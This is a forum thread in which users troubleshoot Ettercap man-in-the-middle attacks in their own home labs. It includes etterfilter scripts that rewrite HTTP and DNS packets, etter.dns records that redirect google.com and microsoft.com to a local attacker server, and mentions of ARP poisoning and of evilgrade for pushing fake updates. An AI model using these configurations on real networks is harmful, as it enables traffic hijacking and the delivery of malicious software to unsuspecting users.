Results 1 to 7 of 7

Thread: Experimenting with Ettercap

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Default Experimenting with Ettercap

    I have spent the day playing with ettercap and learning about all of its great features. I am VERY impressed with its features, expecialy the custom filter capabilities. Being able to manipulate network traffice at the packet level in real time is some pretty cool stuff. So I just have a couple of questions and hopefully some of the informed people on these forums can shed some light on some things for me. My enviornment is as follows.

    one laptop running BT3 final
    one windows XP box
    Both plugged directly into a linksys router/switch

    First off I can't get the dns_spoof plugin to work. I edit /user/local/share/ettercap/etter.dns then save changes and start the plugin. When the windows client access the web the only dns spoofing that works are the ones already built into the etter.dns file as examples. Like forwarding microsoft.com to linux.org etc. My additions don't seem to work. I know the first reaction of most people is that I must be typing in the records wrong but I promise I have tried tons of times and I know its not a syntax mistake.

    The second problem I have run into is with a custom filter I was playing with to kind of work around the dns spoofing not working. Here is the filter

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
         if (search(DATA.data, "Accept-Rubbish!")) {
              replace("Accept-Rubbish!", "Accept-Rubbish!");
         msg("zapped Accept-Rubbish!\n");
         }
    }
    
    if (ip.proto == UDP && tcp.dst == 53) {
         if (search(DECODED.data, "tools")) {
              replace("tools", "yahoo");
         msg("Replaced Tools\n");
         }
    }
    Now this works as if I try to go to tools.com I get yahoo.com. The problem is when I change the word tools to a word that is not the same character length as yahoo. I watched the packets with wireshark and what ends up happening is a checksum error on the packet header. Does anyone know how to work around something like that? Maybe a way to change the packet header checksum value by adding or subtracting from it? Or does someone know a better way to accomplish what I am trying to do? Sorry if I'm posting in the wrong area of the forum but I am a newb so I thought this is where my question should be. Thanks!

  2. #2
    Member imported_pynstrom's Avatar
    Join Date
    May 2008
    Posts
    143

    Default

    Your right, my first guess would be a syntax error in the etter.dns file. And just as an example, this works fine for me:
    Code:
    * A 65.98.92.48
    *.* A 65.98.92.48
    *.*.* A 65.98.92.48
    *.*.*.* A 65.98.92.48
    As far as the filter, if the code you posted is a copy/paste from your filter the second and third line of your code should look like this:
    Code:
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
    The way you have it set up now the first replace command doesn't do anything. This might solve the rest of the problem, if it doesn't a partial fix for the text swapping would be to add spaces to the spoofed address as the browser should work with "www.yahoo.com" or "www.yahoo .com". This only works if the spoofed address is shorter than the original one.
    When hungry, eat your rice; when tired, close your eyes. Fools may laugh at me, but wise men will know what I mean. -- Lin-Chi
    - - - - - - - -
    I slept once, it was a Tuesday.

  3. #3
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    more on etterfilter http://forums.remote-exploit.org/showthread.php?p=94904 also google etterfilter forums

  4. #4
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Default

    Wow I don't know how I did that. That was not a copy paste and my actual code was correct. I am still having some trouble but I will check the etterfilter forums as suggested. Thanks guys.

  5. #5
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    Quote Originally Posted by dudeman02379 View Post
    First off I can't get the dns_spoof plugin to work. I edit /user/local/share/ettercap/etter.dns then save changes and start the plugin. When the windows client access the web the only dns spoofing that works are the ones already built into the etter.dns file as examples. Like forwarding microsoft.com to linux.org etc. My additions don't seem to work. I know the first reaction of most people is that I must be typing in the records wrong but I promise I have tried tons of times and I know its not a syntax mistake.
    I am having this exact same problem. Strangely enough it is only on my backtrack laptop machine. I am running ubuntu on my desktop and have ettercap on that machine as well and it works well sort of.
    here is my"/usr/share/ettercap/etter.dns" on my ubuntu machine:

    ################################
    # microsoft sucks
    # redirect it to www.linux.org
    #
    google.com A 192.168.1.3
    *.google.com A 192.168.1.3
    microsoft.com A 192.168.1.3
    *.microsoft.com A 192.168.1.3
    www.microsoft.com PTR 192.168.1.3 # Wildcards in PTR are not allowed

    ##########################################

    the IP forwards them to my local apache server for a wonderful white page that says only "Holy Haxor Batman!"

    Here is the breakdown of what is working in using IE 6.0 on victim:
    google.com gets Haxor
    www.google.com gets Haxor
    microsoft.com gets Haxor
    www.microsoft.com gets real MS site. It used to go to linux under the default but stopped working when I changed the IP. (very strange)

    anything with prefix.microsoft.com gets the normal webpage. Anything with prefix.google.com gets Haxor.

    Now on my backtrack machine I do the exact same procedure with (nearly) the exact same configuration only at: "/usr/local/share/ettercap/etter.dns"

    ################################
    # microsoft sucks
    # redirect it to www.linux.org
    #
    google.com A 192.168.1.3
    *.google.com A 192.168.1.3
    www.google.com PTR 192.168.1.3
    microsoft.com A 192.168.1.3
    *.microsoft.com A 192.168.1.3
    www.microsoft.com PTR 192.168.1.3 # Wildcards in PTR are not allowed

    ##########################################

    All requests get their normal returns even mircosoft.com where the only edit was replacing the IP address. typing 192.168.1.3 in the browser gets Haxor so the server is still up.

    What is strange is that in the Ettercap feed when I visit the pages im trying to spoof it responds with:
    "dns_spoof: [www.google.com][ spoofed to [192.168.1.3]"
    "dns_spoof: [clients1.google.com] spoofed to [192.168.1.3]"
    "dns_spoof: [www.microsoft.com] spoofed to [192.168.1.3]"
    "dns_spoof: [i.microsoft.com] spoofed to [192.168.1.3]"
    etc...

    This would suggest that I am editing the proper file and that the changes are taking effect and the the plugin is loading correctly into ettercap.

    I can think of only one possible reason for all this to happen. My BT box is an old laptop using a wifi connection. My victim is also an old laptop using wifi, while my ubuntu is an alienware monster wired to the LAN. All three machines are located in the same room with my router 1 room over (about 10 feet away) through a solid wooden wall.

    Is it possible that because my Ubuntu box is faster/wired that it is beating the dns query and inserting its spoofed one first while my slower/wifi box is just not doing it fast enough to beat the server? If we were working with airpwn im sure that would be the problem but Im not sure if that is the same way ettercap's ARP poisoning/DNS spoofing work.

    Been working on this all day and could use some help, thanks guys! :-)
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  6. #6
    Member
    Join Date
    Jan 2008
    Posts
    194

    Default

    I can think of only one possible reason for all this to happen. My BT box is an old laptop using a wifi connection. My victim is also an old laptop using wifi, while my ubuntu is an alienware monster wired to the LAN. All three machines are located in the same room with my router 1 room over (about 10 feet away) through a solid wooden wall.

    Is it possible that because my Ubuntu box is faster/wired that it is beating the dns query and inserting its spoofed one first while my slower/wifi box is just not doing it fast enough to beat the server? If we were working with airpwn im sure that would be the problem but Im not sure if that is the same way ettercap's ARP poisoning/DNS spoofing work.
    I can't offer you any solutions to your other problems but I think I know the answer to the quoted.

    I assume you're doing ARP poisoning and as such, every packet destined for the router gets routed through your machine, wifi or not. The target is sending packets to your wireless card mac that resides on the machine running ettercap. Therefore, I assume it to be unlikely that there is a timing issue that is causing ettercap to "miss" the DNS request.

  7. #7
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    Quote Originally Posted by dudeman02379 View Post
    Now this works as if I try to go to tools.com I get yahoo.com. The problem is when I change the word tools to a word that is not the same character length as yahoo. I watched the packets with wireshark and what ends up happening is a checksum error on the packet header. Does anyone know how to work around something like that? Maybe a way to change the packet header checksum value by adding or subtracting from it? Or does someone know a better way to accomplish what I am trying to do? Sorry if I'm posting in the wrong area of the forum but I am a newb so I thought this is where my question should be. Thanks!
    Shameless bump, however I would really like to know if anyone has made any headway on this issue. Ive been trying to get evilgrade working and this issue with etter.dns not working is a major roadblock. Ive been able to get etter.dns working on my wired desktop but It simply won't work off any of my laptops.

    Wired Desktop (2.4ghz amd dualcore 3 gig ram) on Ubunutu Hardy, dns spoof: WORKING
    Wireless Laptop 1 (1.5ghz pentium 512 ram) BT3beta, dns spoof: NOT WORKING
    Wireless Laptop 2 (2.0ghz Core2Duo 3gig ram) BT3Final, dns spoof: NOT WORKING

    Cain and able DNS Spoofing however works on all three...

    From wireshark im getting two different problems. On Laptop 1 I get both a spoofed and a normal reply, the victim gets both and selects the normal reply over the spoofed one. On Laptop 2 there is simply no spoofed reply going out.

    I have tried this from both HD installs and USB live boots, I have used the exact same configuration and syntax that worked on my desktop.

    The only work around I have been able to concoct is to set up the evilgrade webserver on a VM running BackTrack in windows and use cain and able to divert traffic to it. It works but it is incredibly annoying to setup correctly especially when it should "JUST WORK" with ettercap. Not to mention any time a person who knows better boots windows, god kills a kitten, and I like kittens...
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •